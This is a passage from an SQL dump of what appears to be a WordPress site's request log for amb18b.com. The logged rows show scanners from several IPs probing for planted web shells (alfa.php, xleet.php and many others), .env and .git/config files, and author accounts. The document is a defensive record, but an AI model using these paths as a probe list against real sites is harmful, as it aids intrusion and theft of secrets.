17:20:56'),(6526,'https://amb18b.com/bolt.php','103.186.31.45','Direct Access',1,'2025-11-13 17:21:00','2025-11-13 17:21:00'),(6527,'https://amb18b.com/shlo.php','103.186.31.45','Direct Access',1,'2025-11-13 17:21:03','2025-11-13 17:21:03'),(6528,'https://amb18b.com/133.php','103.186.31.45','Direct Access',1,'2025-11-13 17:21:05','2025-11-13 17:21:05'),(6529,'https://amb18b.com/ahax.php','103.186.31.45','Direct Access',1,'2025-11-13 17:21:06','2025-11-13 17:21:06'),(6530,'https://amb18b.com/wpssl.php','103.186.31.45','Direct Access',1,'2025-11-13 17:21:09','2025-11-13 17:21:09'),(6531,'https://amb18b.com/witmm.php','103.186.31.45','Direct Access',1,'2025-11-13 17:21:11','2025-11-13 17:21:11'),(6532,'https://amb18b.com/wp-admin/css/index.php','103.186.31.45','Direct Access',1,'2025-11-13 17:21:13','2025-11-13 17:21:13'),(6533,'https://amb18b.com/files.php','103.186.31.45','Direct Access',1,'2025-11-13 17:21:16','2025-11-13 17:21:16'),(6534,'https://amb18b.com/wp-editor.php','103.186.31.45','Direct Access',1,'2025-11-13 17:21:17','2025-11-13 17:21:17'),(6535,'https://amb18b.com/?author=2','206.189.133.168','Direct Access',1,'2025-11-13 17:54:19','2025-11-13 17:54:19'),(6536,'https://amb18b.com//wp-includes/wlwmanifest.xml','35.237.130.112','Direct Access',1,'2025-11-13 17:58:27','2025-11-13 17:58:27'),(6537,'https://amb18b.com//?author=2','35.237.130.112','Direct Access',1,'2025-11-13 17:58:31','2025-11-13 17:58:31'),(6538,'https://amb18b.com/?author=2','161.118.166.167','Direct Access',1,'2025-11-13 18:28:56','2025-11-13 18:28:56'),(6539,'https://amb18b.com/?author=3','161.118.166.167','Direct Access',1,'2025-11-13 18:28:57','2025-11-13 18:28:57'),(6540,'https://amb18b.com/?author=4','161.118.166.167','Direct Access',1,'2025-11-13 18:28:59','2025-11-13 18:28:59'),(6541,'https://amb18b.com/?author=5','161.118.166.167','Direct Access',1,'2025-11-13 18:29:00','2025-11-13 18:29:00'),(6542,'https://amb18b.com/sitemap.xml','194.163.179.108','Direct Access',1,'2025-11-13 20:20:22','2025-11-13 20:20:22'),(6543,'https://amb18b.com/wp-sitemap.xml','194.163.179.108','Direct Access',1,'2025-11-13 20:20:39','2025-11-13 20:20:39'),(6544,'https://amb18b.com/wp-sitemap-users-1.xml','194.163.179.108','Direct Access',1,'2025-11-13 20:21:04','2025-11-13 20:21:04'),(6545,'https://amb18b.com/wp-sitemap-users-1.xml','187.45.187.88','Direct Access',1,'2025-11-13 20:21:14','2025-11-13 20:21:14'),(6546,'https://amb18b.com/author-sitemap.xml','78.188.229.245','Direct Access',1,'2025-11-13 20:21:43','2025-11-13 20:21:43'),(6547,'https://amb18b.com/Wp-JsOn/Wp/V2/UsErS','54.95.210.88','Direct Access',1,'2025-11-13 20:24:14','2025-11-13 20:24:14'),(6548,'https://amb18b.com/graphql','194.164.126.55','Direct Access',1,'2025-11-13 20:26:05','2025-11-13 20:26:05'),(6549,'https://amb18b.com/graphql','185.55.249.123','Direct Access',1,'2025-11-13 20:27:07','2025-11-13 20:27:07'),(6550,'https://amb18b.com/style.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:18','2025-11-13 20:54:18'),(6551,'https://amb18b.com/wp-admin/style.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:22','2025-11-13 20:54:22'),(6552,'https://amb18b.com/wp-includes/style.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:23','2025-11-13 20:54:23'),(6553,'https://amb18b.com/chosen.php?p=','103.186.31.45','Direct Access',1,'2025-11-13 20:54:24','2025-11-13 20:54:24'),(6554,'https://amb18b.com/file.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:25','2025-11-13 20:54:25'),(6555,'https://amb18b.com/flower.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:26','2025-11-13 20:54:26'),(6556,'https://amb18b.com/gifclass.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:27','2025-11-13 20:54:27'),(6557,'https://amb18b.com/bless.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:28','2025-11-13 20:54:28'),(6558,'https://amb18b.com/class-t.api.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:29','2025-11-13 20:54:29'),(6559,'https://amb18b.com/blurbs.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:30','2025-11-13 20:54:30'),(6560,'https://amb18b.com/akcc.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:31','2025-11-13 20:54:31'),(6561,'https://amb18b.com/abcd.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:32','2025-11-13 20:54:32'),(6562,'https://amb18b.com/shelp.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:33','2025-11-13 20:54:33'),(6563,'https://amb18b.com/cord.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:34','2025-11-13 20:54:34'),(6564,'https://amb18b.com/dex.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:35','2025-11-13 20:54:35'),(6565,'https://amb18b.com/file2.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:37','2025-11-13 20:54:37'),(6566,'https://amb18b.com//zwso.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:38','2025-11-13 20:54:38'),(6567,'https://amb18b.com/wp-admin/zwso.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:39','2025-11-13 20:54:39'),(6568,'https://amb18b.com/bolt.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:41','2025-11-13 20:54:41'),(6569,'https://amb18b.com/shlo.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:42','2025-11-13 20:54:42'),(6570,'https://amb18b.com/133.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:43','2025-11-13 20:54:43'),(6571,'https://amb18b.com/ahax.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:44','2025-11-13 20:54:44'),(6572,'https://amb18b.com/php8.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:45','2025-11-13 20:54:45'),(6573,'https://amb18b.com/lufix1.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:46','2025-11-13 20:54:46'),(6574,'https://amb18b.com/witmm.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:47','2025-11-13 20:54:47'),(6575,'https://amb18b.com/wp-admin/css/index.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:48','2025-11-13 20:54:48'),(6576,'https://amb18b.com/ioxi-o.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:49','2025-11-13 20:54:49'),(6577,'https://amb18b.com/222.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:50','2025-11-13 20:54:50'),(6578,'https://amb18b.com/files.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:51','2025-11-13 20:54:51'),(6579,'https://amb18b.com/wp-editor.php','103.186.31.45','Direct Access',1,'2025-11-13 20:54:52','2025-11-13 20:54:52'),(6580,'https://amb18b.com/.env','78.153.140.128','Direct Access',1,'2025-11-13 21:01:39','2025-11-13 21:01:39'),(6581,'https://amb18b.com/aa.php','40.122.173.152','Direct Access',1,'2025-11-13 23:06:55','2025-11-13 23:06:55'),(6582,'https://amb18b.com/abcd.php','40.122.173.152','Direct Access',1,'2025-11-13 23:06:57','2025-11-13 23:06:57'),(6583,'https://amb18b.com/admin.php','40.122.173.152','Direct Access',1,'2025-11-13 23:06:59','2025-11-13 23:06:59'),(6584,'https://amb18b.com/cgi-bin/','40.122.173.152','Direct Access',1,'2025-11-13 23:07:01','2025-11-13 23:07:01'),(6585,'https://amb18b.com/edit.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:03','2025-11-13 23:07:03'),(6586,'https://amb18b.com/file.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:05','2025-11-13 23:07:05'),(6587,'https://amb18b.com/flower.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:06','2025-11-13 23:07:06'),(6588,'https://amb18b.com/images/index.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:08','2025-11-13 23:07:08'),(6589,'https://amb18b.com/info.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:10','2025-11-13 23:07:10'),(6590,'https://amb18b.com/NewFile.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:12','2025-11-13 23:07:12'),(6591,'https://amb18b.com/alfa.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:14','2025-11-13 23:07:14'),(6592,'https://amb18b.com/ioxi-o.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:15','2025-11-13 23:07:15'),(6593,'https://amb18b.com/nc4.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:17','2025-11-13 23:07:17'),(6594,'https://amb18b.com/13.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:19','2025-11-13 23:07:19'),(6595,'https://amb18b.com/kk.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:21','2025-11-13 23:07:21'),(6596,'https://amb18b.com/jp.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:23','2025-11-13 23:07:23'),(6597,'https://amb18b.com/403.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:24','2025-11-13 23:07:24'),(6598,'https://amb18b.com/ds.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:26','2025-11-13 23:07:26'),(6599,'https://amb18b.com/xmrlpc.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:28','2025-11-13 23:07:28'),(6600,'https://amb18b.com/about.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:30','2025-11-13 23:07:30'),(6601,'https://amb18b.com/adminfuns.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:32','2025-11-13 23:07:32'),(6602,'https://amb18b.com/asasx.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:33','2025-11-13 23:07:33'),(6603,'https://amb18b.com/autoload_classmap.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:35','2025-11-13 23:07:35'),(6604,'https://amb18b.com/classwithtostring.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:37','2025-11-13 23:07:37'),(6605,'https://amb18b.com/cong.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:39','2025-11-13 23:07:39'),(6606,'https://amb18b.com/file2.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:41','2025-11-13 23:07:41'),(6607,'https://amb18b.com/moon.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:43','2025-11-13 23:07:43'),(6608,'https://amb18b.com/cache.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:45','2025-11-13 23:07:45'),(6609,'https://amb18b.com/axx.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:47','2025-11-13 23:07:47'),(6610,'https://amb18b.com/xleet.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:48','2025-11-13 23:07:48'),(6611,'https://amb18b.com/cgi-bin/xmrlpc.php','40.122.173.152','Direct Access',1,'2025-11-13 23:07:50','2025-11-13 23:07:50'),(6612,'https://amb18b.com/.git/config','2.57.122.173','Direct Access',1,'2025-11-14 00:18:57','2025-11-14 00:18:57'),(6613,'https://amb18b.com/?p=1','51.161.65.17','Direct Access',1,'2025-11-14 00:42:58','2025-11-14 00:42:58'),(6614,'https://amb18b.com/media/system/js/core.js','35.185.18.235','Direct Access',1,'2025-11-14 04:37:26','2025-11-14 04:37:26'),(6615,'https://amb18b.com/?p=1','42.94.45.160','Direct Access',1,'2025-11-14 04:45:35','2025-11-14 04:45:35'),(6616,'https://amb18b.com/.env','34.61.77.225','Direct Access',1,'2025-11-14 05:36:10','2025-11-14 05:36:10'),(6617,'https://amb18b.com/abcd.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:21','2025-11-14 06:35:21'),(6618,'https://amb18b.com/file17.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:23','2025-11-14 06:35:23'),(6619,'https://amb18b.com/goods.php','13.74.149.244','Direct Access',2,'2025-11-14 06:38:44','2025-11-14 06:35:24'),(6620,'https://amb18b.com/blue.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:26','2025-11-14 06:35:26'),(6621,'https://amb18b.com/num.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:28','2025-11-14 06:35:28'),(6622,'https://amb18b.com/rh.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:29','2025-11-14 06:35:29'),(6623,'https://amb18b.com/222.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:31','2025-11-14 06:35:31'),(6624,'https://amb18b.com/sh.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:33','2025-11-14 06:35:33'),(6625,'https://amb18b.com/css.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:34','2025-11-14 06:35:34'),(6626,'https://amb18b.com/thai.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:36','2025-11-14 06:35:36'),(6627,'https://amb18b.com/filei.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:38','2025-11-14 06:35:38'),(6628,'https://amb18b.com/v2.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:39','2025-11-14 06:35:39'),(6629,'https://amb18b.com/3.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:42','2025-11-14 06:35:42'),(6630,'https://amb18b.com/10.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:43','2025-11-14 06:35:43'),(6631,'https://amb18b.com/.well-known/info.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:45','2025-11-14 06:35:45'),(6632,'https://amb18b.com/ee.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:47','2025-11-14 06:35:47'),(6633,'https://amb18b.com/rsnu.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:48','2025-11-14 06:35:48'),(6634,'https://amb18b.com/x4.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:50','2025-11-14 06:35:50'),(6635,'https://amb18b.com/kk.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:52','2025-11-14 06:35:52'),(6636,'https://amb18b.com/bless3.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:54','2025-11-14 06:35:54'),(6637,'https://amb18b.com/456.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:55','2025-11-14 06:35:55'),(6638,'https://amb18b.com/z.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:57','2025-11-14 06:35:57'),(6639,'https://amb18b.com/Sanskrit.php','13.74.149.244','Direct Access',1,'2025-11-14 06:35:59','2025-11-14 06:35:59'),(6640,'https://amb18b.com/naxc.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:07','2025-11-14 06:36:07'),(6641,'https://amb18b.com/asasx.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:09','2025-11-14 06:36:09'),(6642,'https://amb18b.com/lc.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:11','2025-11-14 06:36:11'),(6643,'https://amb18b.com/mo.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:12','2025-11-14 06:36:12'),(6644,'https://amb18b.com/nij.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:14','2025-11-14 06:36:14'),(6645,'https://amb18b.com/gfile.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:16','2025-11-14 06:36:16'),(6646,'https://amb18b.com/xpas2.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:18','2025-11-14 06:36:18'),(6647,'https://amb18b.com/filemanager.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:19','2025-11-14 06:36:19'),(6648,'https://amb18b.com/x.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:21','2025-11-14 06:36:21'),(6649,'https://amb18b.com/asd67.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:23','2025-11-14 06:36:23'),(6650,'https://amb18b.com/alam.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:24','2025-11-14 06:36:24'),(6651,'https://amb18b.com/700.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:26','2025-11-14 06:36:26'),(6652,'https://amb18b.com/fifi.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:28','2025-11-14 06:36:28'),(6653,'https://amb18b.com/wp-signup.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:30','2025-11-14 06:36:30'),(6654,'https://amb18b.com/gold.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:31','2025-11-14 06:36:31'),(6655,'https://amb18b.com/blurbs8.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:33','2025-11-14 06:36:33'),(6656,'https://amb18b.com/sid.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:35','2025-11-14 06:36:35'),(6657,'https://amb18b.com/tinyfilemanager.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:37','2025-11-14 06:36:37'),(6658,'https://amb18b.com/unity.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:38','2025-11-14 06:36:38'),(6659,'https://amb18b.com/cf.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:42','2025-11-14 06:36:42'),(6660,'https://amb18b.com/get.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:44','2025-11-14 06:36:44'),(6661,'https://amb18b.com/v3.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:45','2025-11-14 06:36:45'),(6662,'https://amb18b.com/.well-known/ws.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:47','2025-11-14 06:36:47'),(6663,'https://amb18b.com/wteed.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:49','2025-11-14 06:36:49'),(6664,'https://amb18b.com/nc4.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:51','2025-11-14 06:36:51'),(6665,'https://amb18b.com/ntgn.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:53','2025-11-14 06:36:53'),(6666,'https://amb18b.com/ioxi-o.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:54','2025-11-14 06:36:54'),(6667,'https://amb18b.com/ws.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:56','2025-11-14 06:36:56'),(6668,'https://amb18b.com/7h.php','13.74.149.244','Direct Access',1,'2025-11-14 06:36:58','2025-11-14 06:36:58'),(6669,'https://amb18b.com/gg.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:00','2025-11-14 06:37:00'),(6670,'https://amb18b.com/co.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:01','2025-11-14 06:37:01'),(6671,'https://amb18b.com/mjq.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:03','2025-11-14 06:37:03'),(6672,'https://amb18b.com/rdfe.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:05','2025-11-14 06:37:05'),(6673,'https://amb18b.com/xojryvch.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:06','2025-11-14 06:37:06'),(6674,'https://amb18b.com/reyna.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:08','2025-11-14 06:37:08'),(6675,'https://amb18b.com/css/index.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:10','2025-11-14 06:37:10'),(6676,'https://amb18b.com/unzip.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:12','2025-11-14 06:37:12'),(6677,'https://amb18b.com/cool.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:14','2025-11-14 06:37:14'),(6678,'https://amb18b.com/.well-known/xin1.php?p','13.74.149.244','Direct Access',1,'2025-11-14 06:37:15','2025-11-14 06:37:15'),(6679,'https://amb18b.com/axx.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:17','2025-11-14 06:37:17'),(6680,'https://amb18b.com/w3llstore.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:19','2025-11-14 06:37:19'),(6681,'https://amb18b.com/aua.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:20','2025-11-14 06:37:20'),(6682,'https://amb18b.com/c4.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:22','2025-11-14 06:37:22'),(6683,'https://amb18b.com/bu5.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:24','2025-11-14 06:37:24'),(6684,'https://amb18b.com/lhh2.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:26','2025-11-14 06:37:26'),(6685,'https://amb18b.com/an.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:27','2025-11-14 06:37:27'),(6686,'https://amb18b.com/aw.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:29','2025-11-14 06:37:29'),(6687,'https://amb18b.com/as.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:31','2025-11-14 06:37:31'),(6688,'https://amb18b.com/new.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:33','2025-11-14 06:37:33'),(6689,'https://amb18b.com/Okxob.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:34','2025-11-14 06:37:34'),(6690,'https://amb18b.com/ahax.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:36','2025-11-14 06:37:36'),(6691,'https://amb18b.com/cache.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:38','2025-11-14 06:37:38'),(6692,'https://amb18b.com/ffile.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:39','2025-11-14 06:37:39'),(6693,'https://amb18b.com/nxac.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:41','2025-11-14 06:37:41'),(6694,'https://amb18b.com/thh.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:43','2025-11-14 06:37:43'),(6695,'https://amb18b.com/wp-includes/buy.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:45','2025-11-14 06:37:45'),(6696,'https://amb18b.com/baxa1.phP8','13.74.149.244','Direct Access',1,'2025-11-14 06:37:46','2025-11-14 06:37:46'),(6697,'https://amb18b.com/lo.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:48','2025-11-14 06:37:48'),(6698,'https://amb18b.com/fb.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:49','2025-11-14 06:37:49'),(6699,'https://amb18b.com/wp-update.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:51','2025-11-14 06:37:51'),(6700,'https://amb18b.com/slo.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:53','2025-11-14 06:37:53'),(6701,'https://amb18b.com/dropdown.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:55','2025-11-14 06:37:55'),(6702,'https://amb18b.com/pp.php','13.74.149.244','Direct Access',1,'2025-11-14 06:37:57','2025-11-14 06:37:57'),(6703,'https://amb18b.com/bqcheck.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:01','2025-11-14 06:38:01'),(6704,'https://amb18b.com/13k.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:03','2025-11-14 06:38:03'),(6705,'https://amb18b.com/ar.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:04','2025-11-14 06:38:04'),(6706,'https://amb18b.com/bv3.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:06','2025-11-14 06:38:06'),(6707,'https://amb18b.com/aa.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:08','2025-11-14 06:38:08'),(6708,'https://amb18b.com/racs3.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:10','2025-11-14 06:38:10'),(6709,'https://amb18b.com/content.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:17','2025-11-14 06:38:17'),(6710,'https://amb18b.com/lufix.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:20','2025-11-14 06:38:20'),(6711,'https://amb18b.com/bluejackets.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:22','2025-11-14 06:38:22'),(6712,'https://amb18b.com/zt2.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:24','2025-11-14 06:38:24'),(6713,'https://amb18b.com/f35.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:30','2025-11-14 06:38:30'),(6714,'https://amb18b.com/wp-mn.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:33','2025-11-14 06:38:33'),(6715,'https://amb18b.com/modules/mod_simplefileuploadv1.3/elements/wpxadmin.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:34','2025-11-14 06:38:34'),(6716,'https://amb18b.com/aa8.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:36','2025-11-14 06:38:36'),(6717,'https://amb18b.com/xl.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:38','2025-11-14 06:38:38'),(6718,'https://amb18b.com/r4f_1.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:40','2025-11-14 06:38:40'),(6719,'https://amb18b.com/sarang.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:43','2025-11-14 06:38:43'),(6720,'https://amb18b.com/6.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:46','2025-11-14 06:38:46'),(6721,'https://amb18b.com/xo.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:48','2025-11-14 06:38:48'),(6722,'https://amb18b.com/ggs.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:49','2025-11-14 06:38:49'),(6723,'https://amb18b.com/wsr2.php?p=','13.74.149.244','Direct Access',1,'2025-11-14 06:38:51','2025-11-14 06:38:51'),(6724,'https://amb18b.com/class9.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:53','2025-11-14 06:38:53'),(6725,'https://amb18b.com/public/wsr2.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:55','2025-11-14 06:38:55'),(6726,'https://amb18b.com/tcp.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:57','2025-11-14 06:38:57'),(6727,'https://amb18b.com/witmm.php','13.74.149.244','Direct Access',1,'2025-11-14 06:38:59','2025-11-14 06:38:59'),(6728,'https://amb18b.com/fm.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:00','2025-11-14 06:39:00'),(6729,'https://amb18b.com/jga.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:02','2025-11-14 06:39:02'),(6730,'https://amb18b.com/nxx.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:04','2025-11-14 06:39:04'),(6731,'https://amb18b.com/aaaa.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:06','2025-11-14 06:39:06'),(6732,'https://amb18b.com/2.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:08','2025-11-14 06:39:08'),(6733,'https://amb18b.com/ss.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:10','2025-11-14 06:39:10'),(6734,'https://amb18b.com/zc.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:11','2025-11-14 06:39:11'),(6735,'https://amb18b.com/dex.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:14','2025-11-14 06:39:14'),(6736,'https://amb18b.com/sad.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:16','2025-11-14 06:39:16'),(6737,'https://amb18b.com/wp.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:17','2025-11-14 06:39:17'),(6738,'https://amb18b.com/wp-gr.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:19','2025-11-14 06:39:19'),(6739,'https://amb18b.com/cfile.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:21','2025-11-14 06:39:21'),(6740,'https://amb18b.com/sder52u.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:23','2025-11-14 06:39:23'),(6741,'https://amb18b.com/asserter.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:24','2025-11-14 06:39:24'),(6742,'https://amb18b.com/ol.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:26','2025-11-14 06:39:26'),(6743,'https://amb18b.com/pass.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:28','2025-11-14 06:39:28'),(6744,'https://amb18b.com/l.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:30','2025-11-14 06:39:30'),(6745,'https://amb18b.com/ot.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:32','2025-11-14 06:39:32'),(6746,'https://amb18b.com/wp-rss4.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:33','2025-11-14 06:39:33'),(6747,'https://amb18b.com/dev.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:35','2025-11-14 06:39:35'),(6748,'https://amb18b.com/bin.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:37','2025-11-14 06:39:37'),(6749,'https://amb18b.com/yee.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:38','2025-11-14 06:39:38'),(6750,'https://amb18b.com/epinyins.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:40','2025-11-14 06:39:40'),(6751,'https://amb18b.com/aa17.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:42','2025-11-14 06:39:42'),(6752,'https://amb18b.com/winkel.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:44','2025-11-14 06:39:44'),(6753,'https://amb18b.com/ef.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:45','2025-11-14 06:39:45'),(6754,'https://amb18b.com/gifclass4.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:47','2025-11-14 06:39:47'),(6755,'https://amb18b.com/667.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:49','2025-11-14 06:39:49'),(6756,'https://amb18b.com/we.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:51','2025-11-14 06:39:51'),(6757,'https://amb18b.com/wp-su.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:52','2025-11-14 06:39:52'),(6758,'https://amb18b.com/t3x.php','13.74.149.244','Direct Access',1,'2025-11-14 06:39:54','2025-11-14 